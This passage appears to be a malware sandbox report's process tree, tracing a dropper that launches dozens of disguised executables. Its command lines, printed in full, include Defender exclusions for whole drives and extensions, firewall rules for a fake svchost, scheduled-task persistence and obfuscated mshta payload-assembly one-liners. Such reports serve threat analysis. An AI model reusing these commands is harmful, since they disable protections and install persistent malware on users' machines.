        "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
        7⤵
        
        PID:3940
        
        C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
        
        "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
        7⤵
        
        PID:3804
        
        C:\Program Files (x86)\Company\NewProduct\inst2.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst2.exe"
        7⤵
        
        PID:5772
      - C:\Users\Admin\Pictures\Adobe Films\DqRhIiPwEqochUYv_5ISY4Zp.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\DqRhIiPwEqochUYv_5ISY4Zp.exe"
        6⤵
        
        PID:6060
        
        C:\Users\Admin\Documents\i8WBiL8z7jI_urefxCBPVbM5.exe
        
        "C:\Users\Admin\Documents\i8WBiL8z7jI_urefxCBPVbM5.exe"
        7⤵
        
        PID:6844
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3100
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2132
      - C:\Users\Admin\Pictures\Adobe Films\5U4q0MWFWfPGXF7QVaR6grOt.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5U4q0MWFWfPGXF7QVaR6grOt.exe"
        6⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 276
        7⤵
        Program crash
        
        PID:3512
      - C:\Users\Admin\Pictures\Adobe Films\tthZl90LGkJrqQQcNbE_RIIw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\tthZl90LGkJrqQQcNbE_RIIw.exe"
        6⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 300
        7⤵
        Program crash
        
        PID:4372
      - C:\Users\Admin\Pictures\Adobe Films\bR2twElFJGIuu6TQPA9wniDV.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\bR2twElFJGIuu6TQPA9wniDV.exe"
        6⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 280
        7⤵
        Program crash
        
        PID:1712
      - C:\Users\Admin\Pictures\Adobe Films\oMPvqs9BYxwt4QZsNYP_OzOQ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\oMPvqs9BYxwt4QZsNYP_OzOQ.exe"
        6⤵
        
        PID:1108
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1768
        7⤵
        Program crash
        
        PID:2960
      - C:\Users\Admin\Pictures\Adobe Films\q36rvWSsQ35eoIM91iuUhdYO.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\q36rvWSsQ35eoIM91iuUhdYO.exe"
        6⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 292
        7⤵
        Program crash
        
        PID:2476
      - C:\Users\Admin\Pictures\Adobe Films\RdVV5avJHPkdah3EsmC6ubsS.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\RdVV5avJHPkdah3EsmC6ubsS.exe"
        6⤵
        
        PID:5228
        
        C:\Users\Admin\Pictures\Adobe Films\RdVV5avJHPkdah3EsmC6ubsS.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\RdVV5avJHPkdah3EsmC6ubsS.exe"
        7⤵
        
        PID:2564
      - C:\Users\Admin\Pictures\Adobe Films\3vs16KMQLeisok2uunDFrpX5.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3vs16KMQLeisok2uunDFrpX5.exe"
        6⤵
        
        PID:6140
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4788
      - C:\Users\Admin\Pictures\Adobe Films\Uhb5cklb9zsX6ICH8U1K6A8H.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Uhb5cklb9zsX6ICH8U1K6A8H.exe"
        6⤵
        
        PID:4040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
        7⤵
        
        PID:5712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
        7⤵
        
        PID:1196
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
        7⤵
        
        PID:6136
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5580
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
        7⤵
        
        PID:2860
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
        7⤵
        Creates scheduled task(s)
        
        PID:5740
        
        C:\Windows\System\svchost.exe
        
        "C:\Windows\System\svchost.exe" formal
        7⤵
        
        PID:4640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
        8⤵
        
        PID:3216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
        8⤵
        
        PID:5228
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
        8⤵
        
        PID:5272
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
        8⤵
        
        PID:4496
      - C:\Users\Admin\Pictures\Adobe Films\Bj6d79cfOfT2JK4QNWwZdBfc.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Bj6d79cfOfT2JK4QNWwZdBfc.exe"
        6⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 300
        7⤵
        Program crash
        
        PID:2880
      - C:\Users\Admin\Pictures\Adobe Films\MLyljXFPLxNhJlWAS3KpgBMU.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\MLyljXFPLxNhJlWAS3KpgBMU.exe"
        6⤵
        
        PID:3764
        
        C:\Users\Admin\Pictures\Adobe Films\MLyljXFPLxNhJlWAS3KpgBMU.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\MLyljXFPLxNhJlWAS3KpgBMU.exe"
        7⤵
        
        PID:344
      - C:\Users\Admin\Pictures\Adobe Films\lF3l8dayrMRbKxaOUKUQ34vB.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lF3l8dayrMRbKxaOUKUQ34vB.exe"
        6⤵
        Executes dropped EXE
        
        PID:5240
      - C:\Users\Admin\Pictures\Adobe Films\IEuT39nblOzddDDDGpZLu3mW.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\IEuT39nblOzddDDDGpZLu3mW.exe"
        6⤵
        
        PID:5520
      - C:\Users\Admin\Pictures\Adobe Films\8B9LzrqGUoHgHm39uvZEwLJx.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\8B9LzrqGUoHgHm39uvZEwLJx.exe"
        6⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 272
        7⤵
        Program crash
        
        PID:5612
      - C:\Users\Admin\Pictures\Adobe Films\caKVARifz253bzwR35VKTIK0.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\caKVARifz253bzwR35VKTIK0.exe"
        6⤵
        
        PID:2464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 280
        7⤵
        Program crash
        
        PID:2592
      - C:\Users\Admin\Pictures\Adobe Films\Vw2nv7Z1PkJS2CxGERjVqIZH.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Vw2nv7Z1PkJS2CxGERjVqIZH.exe"
        6⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\is-Q4446.tmp\Vw2nv7Z1PkJS2CxGERjVqIZH.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q4446.tmp\Vw2nv7Z1PkJS2CxGERjVqIZH.tmp" /SL5="$B023C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Vw2nv7Z1PkJS2CxGERjVqIZH.exe"
        7⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\is-O8RC1.tmp\lakazet.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-O8RC1.tmp\lakazet.exe" /S /UID=2709
        8⤵
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\ba-ce4db-20b-e07aa-f734ea801ac21\Xizhyqowyku.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ba-ce4db-20b-e07aa-f734ea801ac21\Xizhyqowyku.exe"
        9⤵
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\c7-3bc1c-025-15aa9-f492c457d9fa1\Tyjegifoce.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c7-3bc1c-025-15aa9-f492c457d9fa1\Tyjegifoce.exe"
        9⤵
        
        PID:2920
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gc4rbvxb.zxu\installer.exe /qn CAMPAIGN="654" & exit
        10⤵
        
        PID:10576
        
        C:\Users\Admin\AppData\Local\Temp\gc4rbvxb.zxu\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\gc4rbvxb.zxu\installer.exe /qn CAMPAIGN="654"
        11⤵
        
        PID:9832
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4nxjh2w.zzp\any.exe & exit
        10⤵
        
        PID:12968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5se2ik23.iv5\autosubplayer.exe /S & exit
        10⤵
        
        PID:13128
        
        C:\Users\Admin\AppData\Local\Temp\5se2ik23.iv5\autosubplayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\5se2ik23.iv5\autosubplayer.exe /S
        11⤵
        
        PID:9840
        
        C:\Program Files\Windows Defender Advanced Threat Protection\ESYCMUPIXM\foldershare.exe
        
        "C:\Program Files\Windows Defender Advanced Threat Protection\ESYCMUPIXM\foldershare.exe" /VERYSILENT
        9⤵
        
        PID:6348
      - C:\Users\Admin\Pictures\Adobe Films\O0ObZ3cMh9E6MiMOyZz8CvCX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\O0ObZ3cMh9E6MiMOyZz8CvCX.exe"
        6⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        7⤵
        
        PID:988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0768bf0e01cf08ac5.exe
      4⤵
      PID:2156
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe
        
        Sun0768bf0e01cf08ac5.exe
        5⤵
        Executes dropped EXE
        
        PID:2532
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ("cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If """" == """" for %t in (""C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe"") do taskkill -im ""%~NXt"" -f ", 0, tRuE ) )
        6⤵
        
        PID:1568
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi &If "" == "" for %t in ("C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe") do taskkill -im "%~NXt" -f
        7⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe
        
        ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi
        8⤵
        Executes dropped EXE
        
        PID:5188
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ("cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If ""-PhymCZvLUAWi "" == """" for %t in (""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"") do taskkill -im ""%~NXt"" -f ", 0, tRuE ) )
        9⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi &If "-PhymCZvLUAWi " == "" for %t in ("C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe") do taskkill -im "%~NXt" -f
        10⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbSCRipt:cloSe ( CREaTeObJecT( "WscrIPT.sHELL" ).RUN("Cmd /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF & ecHo | sET /P = ""MZ"" > cxQOi7.xVE&cOPy /y /b CxQOI7.xVE + W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To + eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q * " ,0 ,true) )
        9⤵
        
        PID:5820
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF &ecHo | sET /P = "MZ" >cxQOi7.xVE&cOPy /y /b CxQOI7.xVE+ W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To+ eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q *
        10⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ecHo "
        11⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>cxQOi7.xVE"
        11⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\TSiZ8.~
        11⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\TSiZ8.~
        12⤵
        
        PID:5604
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\TSiZ8.~
        13⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\TSiZ8.~
        14⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -im "Sun0768bf0e01cf08ac5.exe" -f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0746b3c4631.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3168
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0746b3c4631.exe
        
        Sun0746b3c4631.exe
        5⤵
        Executes dropped EXE
        
        PID:1340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07e5c589dd5d.exe
      4⤵
      PID:2808
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e5c589dd5d.exe
        
        Sun07e5c589dd5d.exe
        5⤵
        Executes dropped EXE
        
        PID:2268
      - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e5c589dd5d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e5c589dd5d.exe" -u
        6⤵
        Executes dropped EXE
        
        PID:4800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun075d5a7849d7670a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2824
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun075d5a7849d7670a.exe
        
        Sun075d5a7849d7670a.exe
        5⤵
        Executes dropped EXE
        
        PID:4352
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07e840e6fb5.exe
      4⤵
      PID:3420
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe
        
        Sun07e840e6fb5.exe
        5⤵
        Executes dropped EXE
        
        PID:2060
      - C:\Users\Admin\AppData\Local\Temp\is-5JUPP.tmp\Sun07e840e6fb5.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5JUPP.tmp\Sun07e840e6fb5.tmp" /SL5="$801E8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe" /SILENT
        7⤵
        Executes dropped EXE
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\is-NLSMR.tmp\Sun07e840e6fb5.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NLSMR.tmp\Sun07e840e6fb5.tmp" /SL5="$901E8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe" /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\is-J6VU2.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-J6VU2.tmp\postback.exe" ss1
        9⤵
        
        PID:1528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun073980a935.exe
      4⤵
      PID:3980
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun073980a935.exe
        
        Sun073980a935.exe
        5⤵
        Executes dropped EXE
        
        PID:4984
      - C:\Users\Admin\Pictures\Adobe Films\7F9Pq9Hae1NhAZoTrmUMaZp4.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7F9Pq9Hae1NhAZoTrmUMaZp4.exe"
        6⤵
        
        PID:1032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun078a90701e.exe
      4⤵
      PID:3764
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun078a90701e.exe
        
        Sun078a90701e.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3792
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5872
        
        C:\Users\Admin\AppData\Roaming\1123065.exe
        
        "C:\Users\Admin\AppData\Roaming\1123065.exe"
        8⤵
        
        PID:1280
        
        C:\Users\Admin\AppData\Roaming\8907666.exe
        
        "C:\Users\Admin\AppData\Roaming\8907666.exe"
        8⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Roaming\5781124.exe
        
        "C:\Users\Admin\AppData\Roaming\5781124.exe"
        8⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Roaming\5948261.exe
        
        "C:\Users\Admin\AppData\Roaming\5948261.exe"
        8⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Roaming\2291823.exe
        
        "C:\Users\Admin\AppData\Roaming\2291823.exe"
        8⤵
        
        PID:5712
        
        C:\Users\Admin\AppData\Roaming\4958604.exe
        
        "C:\Users\Admin\AppData\Roaming\4958604.exe"
        8⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\4958604.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """"== """" for %v In (""C:\Users\Admin\AppData\Roaming\4958604.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
        9⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\4958604.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""== "" for %v In ("C:\Users\Admin\AppData\Roaming\4958604.exe" ) do taskkill -F -IM "%~Nxv"
        10⤵
        
        PID:5940
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -IM "4958604.exe"
        11⤵
        Kills process with taskkill
        
        PID:2800
        
        C:\Users\Admin\AppData\Roaming\7341621.exe
        
        "C:\Users\Admin\AppData\Roaming\7341621.exe"
        8⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
        7⤵
        Executes dropped EXE
        
        PID:5984
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 308
        8⤵
        Program crash
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        Executes dropped EXE
        
        PID:6048
        
        C:\Users\Admin\AppData\Local\Temp\chrome.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6132
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6132 -s 1712
        8⤵
        Program crash
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\chrome update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5280
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5280 -s 1724
        8⤵
        Program crash
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\chrome1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
        7⤵
        Executes dropped EXE
        
        PID:4820
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4820 -s 1724
        8⤵
        Program crash
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe"
        7⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        8⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
        9⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\chrome2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
        7⤵
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\chrome3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
        7⤵
        
        PID:5304
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5304 -s 2224
        8⤵
        Program crash
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        7⤵
        
        PID:2908
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        8⤵
        
        PID:3792
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        9⤵
        
        PID:5720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        10⤵
        
        PID:5516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        10⤵
        
        PID:7156
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        9⤵
        
        PID:4060
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        10⤵
        Creates scheduled task(s)
        
        PID:2868
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        9⤵
        
        PID:5272
        
        C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        10⤵
        
        PID:2032
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        11⤵
        
        PID:3056
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        12⤵
        
        PID:4332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        13⤵
        
        PID:4968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        13⤵
        
        PID:1124
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        12⤵
        
        PID:3332
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        13⤵
        
        PID:3420
        
        C:\Windows\explorer.exe
        
